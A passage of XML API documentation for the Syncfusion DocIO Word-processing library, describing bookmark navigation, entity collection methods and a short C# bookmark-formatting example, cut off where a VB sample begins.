        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.DeleteTableBookmarkTextBody(Syncfusion.DocIO.DLS.WTable,System.Int32,System.Int32,System.Int32,System.Int32,Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.BookmarkEnd)">
            <summary>
            Delete the bookmark content inside table
            </summary>
            <param name="bkmkTable">Table which is having bookmark content</param>
            <param name="startRowIndex">Bookmark strat owner row index</param>
            <param name="endRowIndex">Bookmark end owner row index</param>
            <param name="startCellIndex">Bookmark start cell index</param>
            <param name="endCellIndex">Bookmark end cell index</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.DeleteParagraphItemsInCell(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Deletes the cell paragraph child items from its owner paragraph
            </summary>
            <param name="paragraph">Tabel cell last paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.DeleteBookmarkTextBody(System.Boolean,System.Boolean)">
            <summary>
            Delete bookmark content inside different section paragraph items/single section paragraph items.
            </summary>
            <param name="saveFormatting">if it is save formatting, set to <c>true</c>.</param>
            <param name="isReplaceBkmkContent">If replace operation set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.MergeMultiSectionBodyItems(Syncfusion.DocIO.DLS.WTextBody,Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Merge end section text body items to start textbody items
            </summary>
            <param name="startTextBody">Start text body</param>
            <param name="endTextBody"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.DeleteFirstSectionItemsFromDocument(System.Int32,System.Int32@,Syncfusion.DocIO.DLS.WTextBody,System.Int32,System.Boolean)">
            <summary>
            Deletes the bodyitems after the bookmark start owner item.
            <param name="startParagraphIndex">Bookmark start owner index</param>
            <param name="endParagraphIndex">Bookmark end owner index</param>
            <param name="startTextBody">Bookmark start owner textbody</param>
            <param name="bkmkStartNextItemIndex">Bookmark start next item index</param>
            <param name="isInSingleSection">If the bookmark content preserved in single section set to <c>true</c></param>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.DeleteLastSectionItemsFromDocument(System.Int32,Syncfusion.DocIO.DLS.WTextBody,System.Boolean,System.Boolean)">
            <summary>
            If the bookmark content inside different section, combine bookmark end owner section to Sections collection
            </summary>
            <param name="endParagraphIndex">Bookmark end owner paragraph index</param>
            <param name="endTextBody">Bookmark end owner text body</param>
            <param name="IsFirstBkmkEnd">When true ,if the bookmark end entity is first item of it's owner paragraph</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.GetSection(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Gets the owner section
            </summary>
            <param name="entity">Entity</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.IsBkmkEndInFirstItem(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.ParagraphItem,System.Int32)">
            <summary>
            To check the bookmark end entity is first item of it's owner paragraph
            </summary>
            <param name="paragraph">Bookmark end owner paragraph</param>
            <param name="bkmkEnd">Current bookmark end</param>
            <param name="bkmkEndPreviosItemIndex">Bookmark end previous item index</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.SetCurrentBookmarkPosition(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WTextBody,Syncfusion.DocIO.DLS.WTextBody,Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.BookmarkEnd,System.Int32,System.Boolean,System.Boolean,System.Boolean,System.Int32)">
            <summary>
            Set the current bookmark position when the bookmark content inside paragraph
            </summary>
            <param name="paragraphStart">Bookmark start owner paragraph</param>
            <param name="paragraphEnd">Bookmark end owner paragraph</param>
            <param name="textBodyStart">Start text body</param>
            <param name="bkmkStart">Current bookmark start</param>
            <param name="bkmkEnd">Current bookmark end</param>
            <param name="startParagraphNextIndex">Bookmark start owner paragraph next index</param>
            <param name="isFirstItemBkmkEnd">Set to <c>true</c> when bookmark end in next section first paragraph first item</param>
            <param name="isReplaceOperation">Set to ,<c>true</c> when perform replcae operation</param>
            <param name="bkmkIndex">Current bookmark index in document bookmarks collection</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.SetCurrentBookmarkPosition(Syncfusion.DocIO.DLS.WTable,Syncfusion.DocIO.DLS.WTable,Syncfusion.DocIO.DLS.WTextBody,Syncfusion.DocIO.DLS.WTextBody,System.Int32)">
            <summary>
            Set Bookmark position when bookmark content inside different table rows
            </summary>
            <param name="bkmkStartTable">Bookmark start owner table</param>
            <param name="bkmkEndTable">Bookmark end owner table</param>
            <param name="startTableTextBody">Bookmark start owner textbody</param>
            <param name="endTableTextBody">Bookmark end owner textbody</param>
            <param name="bkmkIndex">Current bookmark index in document bookmarks collection</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.DeletePreviousItemsInOwnerParagraphgrah(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.BookmarkEnd)">
            <summary>
            Delete the paragraph items which are present before bookmark end entity
            </summary>
            <param name="paragraphEnd">Bookmark end owner paragraph</param>
            <param name="bkmkEnd">Current bookmark end </param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.ReplaceCurrentBookmark(Syncfusion.DocIO.DLS.WParagraph,System.Int32,System.Int32,System.Int32)">
            <summary>
            Replaces the current bookmark start and end into necessary paragraph
            </summary>
            <param name="paragraph">Paragraph</param>
            <param name="bkmkIndex">Current bookmark index in document bookmarks collection</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.ReplaceTableBookmarkContent(Syncfusion.DocIO.DLS.WordDocumentPart,Syncfusion.DocIO.DLS.TextBodyPart)">
            <summary>
            Replace all the worddocument content into single table
            </summary>
            <param name="documentPart">WordDocumentPart content</param>
            <param name="textPart">TextBodyPart content</param>
            <exception cref="T:System.InvalidOperationException">thrown when performing replacing operation bookmark starts and ends in a single table and the document part is having more than one section</exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.CheckCurrentState">
            <summary>
            Checks the current state of navigator.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.InsertText(System.String,System.Boolean,System.Boolean)">
            <summary>
            Inserts the text range to current position
            </summary>
            <param name="text">The text.</param>
            <param name="saveFormatting">if it is save formatting, set to <c>true</c>.</param>
            <param name="isReplaceContent">if it is Replaced content, set to <c>true</c>.</param>
            <returns>TextRange</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.ApplyParagraphFormatting(Syncfusion.DocIO.DLS.IWTextRange)">
            <summary>
            Applies character formatting of the paragraph on text range.
            </summary>
            <param name="textRange"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarksNavigator.InsertBodyItem(Syncfusion.DocIO.DLS.TextBodyItem)">
            <summary>
            Inserts the body item.
            </summary>
            <param name="item">The item.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarksNavigator.Document">
            <summary>
            Gets or sets the Word document of this object.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> object.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarksNavigator.CurrentBookmark">
            <summary>
            Gets the current bookmark.
            </summary>
            <value>The current <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/> object.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarksNavigator.IsStart">
            <summary>
            Gets/Sets the cursor position
            </summary>
            <value>
            <c>true</c>moves the cursor to the beginning of the bookmark.
            <c>false</c>moves the cursor to the end of the bookmark
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarksNavigator.IsAfter">
            <summary>
            Gets/Sets the cursor position
            </summary>
            <value>
            <c>true</c>moves the cursor to be after the bookmark start or end position.
            <c>false</c>moves the cursor to be before the bookmark start or end position.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarksNavigator.RemoveEmptyParagraph">
            <summary>
            Gets or sets a value indicating whether [remove empty paragraph].
            </summary>
            <value>
            <c>true</c> if [remove empty paragraph]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarksNavigator.CurrentBookmarkItem">
            <summary>
            Gets the current bookmark item which can be a <see cref="T:Syncfusion.DocIO.DLS.BookmarkStart"/>
            or <see cref="T:Syncfusion.DocIO.DLS.BookmarkEnd"/>. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.IParagraphItem"/> that specifies whether 
            it is <see cref="T:Syncfusion.DocIO.DLS.BookmarkStart"/> or <see cref="T:Syncfusion.DocIO.DLS.BookmarkEnd"/>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarksNavigator.CurrentParagraphItemIndex">
            <summary>
            Return the index to insert the item into the paragraph 
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.BodyItemCollection">
            <summary>
            Represents a collection of <see cref="T:Syncfusion.DocIO.DLS.TextBodyItem"/> items.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.EntityCollection">
            <summary>
            Represents a collection of DLS entities.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XML.XDLSSerializableCollection">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.CollectionImpl">
            <summary>
            Represents the collection interface.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CollectionImpl.m_innerList">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CollectionImpl.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.CollectionImpl"/> class.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
            <param name="owner">The The <see cref="T:Syncfusion.DocIO.DLS.OwnerHolder"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CollectionImpl.GetEnumerator">
            <summary>
            Returns an enumerator that iterates through a collection.
            </summary>
            <returns>
            An <see cref="T:System.Collections.IEnumerator"></see> object that can be used to iterate through the collection.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.CollectionImpl.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CollectionImpl.Count">
            <summary>
            Gets the number of items in the collection.
            </summary>
            <value>The <b>integer</b> that specifies the count of items.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.CollectionImpl.InnerList">
            <summary>
            Gets the inner list.
            </summary>
            <value>The inner list.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XML.IXDLSSerializableCollection">
            <summary>
            Represents required functionality for serialization by XDLSReader/Writer.
            <remarks>Used for collections/lists implementation</remarks>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSSerializableCollection.AddNewItem(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Collection must creates and adds new empty item.
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.IXDLSSerializableCollection.TagItemName">
            <summary>
            Gets the name of the tag item.
            </summary>
            <value>The name of the tag item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.IXDLSSerializableCollection.Count">
            <summary>
            Gets the count.
            </summary>
            <value>The count.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.XML.XDLSSerializableCollection"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableCollection.Syncfusion#DocIO#DLS#XML#IXDLSSerializableCollection#AddNewItem(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Collection must creates and adds new empty item.
            </summary>
            <param name="reader"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableCollection.CloneToImpl(Syncfusion.DocIO.DLS.CollectionImpl)">
            <summary>
            Clones to other collection.
            </summary>
            <param name="coll">The coll.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableCollection.GetTagItemName">
            <summary>
            Gets name of xml tag
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableCollection.CreateItem(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Creates the item.
            <exclude/>
            </summary>
            <param name="reader">The reader.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.XDLSSerializableCollection.Syncfusion#DocIO#DLS#XML#IXDLSSerializableCollection#TagItemName">
            <summary>
            Gets name of xml tag
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IEntityCollectionBase">
            <summary>
            Represents the entities collections.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ICollectionBase">
            <summary>
            Represents base interface for DLS collections.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ICollectionBase.Count">
            <summary>
            Gets the number of items in collection.
            </summary>
            <value>The <b>integer</b> represents the count of the items.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IEntityCollectionBase.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.Entity"/> at the specified index.
            </summary>
            <param name="index">The zero-based index of the entity to get</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> at the specified index</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid index in the <see cref="T:Syncfusion.DocIO.DLS.IEntityCollectionBase"/></exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.EntityCollection"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.EntityCollection"/> class.
            </summary>
            <param name="doc">The doc.</param>
            <param name="owner">The owner.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.Add(Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Adds the specified entity to the collection.
            </summary>
            <param name="entity">The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> to be added to the collection.</param>
            <returns>The zero-based index of the <see cref="T:Syncfusion.DocIO.DLS.Entity"/>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.GetIndexOfLastBookMarkEnd">
            <summary>
             Get the bookmarkend index if it preserve after the the Paragraph/Table/Cell/Row end mark
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.Clear">
            <summary>
            Removes all items from the collection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.Contains(Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Determines whether an entity is in the collection.
            </summary>
            <param name="entity">The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> to be found in the collection.</param>
            <returns><b>True</b> if it contains the specified entity, otherwise <b>false</b>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.IndexOf(Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Returns the zero-based index of the specified entity.
            </summary>
            <param name="entity">The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> to which the index to be found.</param>
            <returns>The zero-based index of the specified entity.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.Insert(System.Int32,Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Inserts a entity into the collection at the specified index.
            </summary>
            <param name="index">The <b>integer</b> that specifies the index to insert the entity.</param>
            <param name="entity">The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> to be inserted.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.UpdateIndexForDuplicateEntity(System.Int32,System.Boolean)">
            <summary>
            Update the index of the entity. 
            </summary>
            <param name="startIndex">Update start from next of these index entity</param>
            <param name="isAdd">Decide whether is it add or remove operation.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.UpdateIndex(System.Int32,System.Boolean)">
            <summary>
            Update the index of the entity. 
            </summary>
            <param name="startIndex">Update start from next of these index entity</param>
            <param name="isAdd">Decide whether is it add or remove operation.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.Remove(Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Removes the entity from the collection.
            </summary>
            <param name="entity">The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> to be removed.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.RemoveAt(System.Int32)">
            <summary>
            Removes the entity at the specified index from the collection.
            </summary>
            <param name="index">The index of the entity to be removed.</param>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid in the <see cref="T:Syncfusion.DocIO.DLS.EntityCollection"/>.</exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.UpdateDocumentCollection(Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Updates the document collections while removing the text body items from the document.
            </summary>
            <param name="entity">Entity to be removed from the document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.NextSibling(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Gets Next sibling entity.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.PreviousSibling(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Gets Previous sibling entity.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.GetNextOrPrevIndex(System.Int32,Syncfusion.DocIO.DLS.EntityType,System.Boolean)">
            <summary>
            Gets the index of the next or previous element.
            </summary>
            <param name="index">The index.</param>
            <param name="type">The type.</param>
            <param name="next">if it specifies next element, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.InternalClearBy(Syncfusion.DocIO.DLS.EntityType)">
            <summary>
            Removes items of specified type
            </summary>
            <param name="type">The type.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.CloneTo(Syncfusion.DocIO.DLS.EntityCollection)">
            <summary>
            Clones all items to destination collection.
            </summary>
            <param name="destColl">The destination collection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.OnClear">
            <summary>
            Occurs when all items are removed.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.OnInsert(System.Int32,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Occurs when entity is inserted.
            <exclude/>
            </summary>
            <param name="index">The zero-based index to insert the entity.</param>
            <param name="entity">The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> to insert.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.UpdateFieldRange(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Update the field range before it is removed
            </summary>
            <param name="entity"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.UpdateFieldSeparatorAndEnd(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Update the field separator and end to the field
            </summary>
            <param name="entity"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.InsertFieldRange(Syncfusion.DocIO.DLS.WField,System.Int32,System.Int32,System.Boolean)">
            <summary>
            Add the field range to collection
            </summary>
            <param name="field"></param>
            <param name="bodyItemIndex"></param>
            <param name="paraItemIndex"></param>
            <param name="isSkipParaItems"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.OnInsertComplete(System.Int32,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Occurs when entity is inserted.
            <exclude/>
            </summary>
            <param name="index">The zero-based index to insert the entity.</param>
            <param name="entity">The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> to insert.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.OnRemove(System.Int32)">
            <summary>
            occurs when entity is removed.
            <exclude/>
            </summary>
            <param name="index">The zero-based index to remove the entity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.IsCorrectElementType(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Determines whether specified element type is correct.
            </summary>
            <param name="entity">The entity.</param>
            <returns>
            	If the element type is correct, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.OnInsertField(System.Int32,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Called when [insert field].
            </summary>
            <param name="index">The index.</param>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.OnInsertFieldComplete(System.Int32,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Called when [insert field complete].
            </summary>
            <param name="index">The index.</param>
            <param name="entity">The entity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.OnAddFieldComplete(System.Int32,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Called when [add field complete].
            </summary>
            <param name="index">The index.</param>
            <param name="entity">The entity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.IsMergeFieldNeedToBeUpdated(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Determine whether the merge field need to be updated with field marks
            </summary>
            <param name="entity"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.OnMergeFieldComplete(System.Int32,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Update field marks for the Merge fields when add/insert into the paragraph
            </summary>
            <param name="fieldIndex"></param>
            <param name="entity"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.OnInsertFormField(System.Int32,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Called when form field inserts - Performs insertion of bookmark start for the corresponding form field.
            </summary>
            <param name="index">Index</param>
            <param name="entity">Entity</param>
            <returns>Updated index</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.OnInsertFormFieldComplete(System.Int32,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Called after form field inserted - Inserts bookmark end for the corresponding form fields.
            </summary>
            <param name="index">Index</param>
            <param name="entity">Entity</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.OnAddFormFieldComplete(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Called after form field Added - Adds bookmark end for the corresponding form fields.
            </summary>
            <param name="index">Index</param>
            <param name="entity">Entity</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EntityCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.Entity"/> at the specified index.
            </summary>
            <param name="index">The zero-based index of the entity to get.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> at the specified index.</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid index in the <see cref="T:Syncfusion.DocIO.DLS.IEntityCollectionBase"/>.</exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EntityCollection.FirstItem">
            <summary>
            Gets the first item from the collection.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> at the first index.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EntityCollection.LastItem">
            <summary>
            Gets the last item from the collection.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> at the last index.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EntityCollection.Joined">
            <summary>
            Gets a value indicating whether this <see cref="T:Syncfusion.DocIO.DLS.EntityCollection"/> is joined.
            </summary>
            <value>If it is joined, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EntityCollection.IsNewEntityHasField">
            <summary>
            Gets or sets a value indicating that the collection has wfield entity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EntityCollection.Owner">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.EntityCollection.TypesOfElement">
            <summary>
            Gets the type of the elements present in the collection.
            <exclude/>
            </summary>
            <value>The <see cref="T:System.Type"/> collection that contains the types of the elements.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.EntityCollection.ChangeItemsType">
            <summary>
            Specifies the item change entity type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityCollection.ChangeItemsType.Add">
            <summary>
            Add entity type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityCollection.ChangeItemsType.Remove">
            <summary>
            Remove Entity type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.EntityCollection.ChangeItemsType.Clear">
            <summary>
            Clear Entity type.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.EntityCollection.ChangeItems">
            <summary>
            Represents the method that will handle the collection changes.
            </summary>
            <param name="type">The type of action to be performed.</param>
            <param name="entity">The <see cref="T:Syncfusion.DocIO.DLS.Entity"/>.</param>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.EntityCollection.ChangeItemsHandlerList">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.ChangeItemsHandlerList.Add(Syncfusion.DocIO.DLS.EntityCollection.ChangeItems)">
            <summary>
            Adds the specified handler.
            </summary>
            <param name="handler">The handler.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.ChangeItemsHandlerList.Remove(Syncfusion.DocIO.DLS.EntityCollection.ChangeItems)">
            <summary>
            Removes the specified handler.
            </summary>
            <param name="handler">The handler.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.ChangeItemsHandlerList.GetEnumerator">
            <summary>
            Returns an enumerator that iterates through a collection.
            </summary>
            <returns>
            An <see cref="T:System.Collections.IEnumerator"></see> object that can be used to iterate through the collection.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.EntityCollection.ChangeItemsHandlerList.Send(Syncfusion.DocIO.DLS.EntityCollection.ChangeItemsType,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Sends the specified type.
            </summary>
            <param name="type">The type.</param>
            <param name="entity">The entity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BodyItemCollection.#ctor(Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.BodyItemCollection"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/> instance.
            </summary>
            <param name="body">The <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BodyItemCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.BodyItemCollection"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BodyItemCollection.GetTagItemName">
            <summary>
            Gets the name of xml tag
            <exclude/>
            </summary>
            <returns>The <b>string</b> that represents the xml tag name.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BodyItemCollection.CreateItem(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
             <summary>
             Creates the item.
            <exclude/>
             </summary>
             <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
             <returns>The <see cref="T:Syncfusion.DocIO.DLS.OwnerHolder"/>.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BodyItemCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.Entity"/> at the specified index.
            </summary>
            <value></value>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BodyItemCollection.TypesOfElement">
            <summary>
            Gets the type of the elements present in the collection. Read-only.
            <exclude/>
            </summary>
            <value>The <see cref="T:System.Type"/> collection that contains the types of the elements.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.BookmarkCollection">
            <summary>
            Represents the collection of <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/> in the Word document.
            </summary>
            <example>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Get the bookmark instance with bookmark name
                Syncfusion.DocIO.DLS.Bookmark bookmark = document.Bookmarks["Northwind"];
                //Access the bookmark start�s owner paragraph using bookmark and change its back color
                bookmark.BookmarkStart.OwnerParagraph.ParagraphFormat.BackColor = Color.AliceBlue;
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
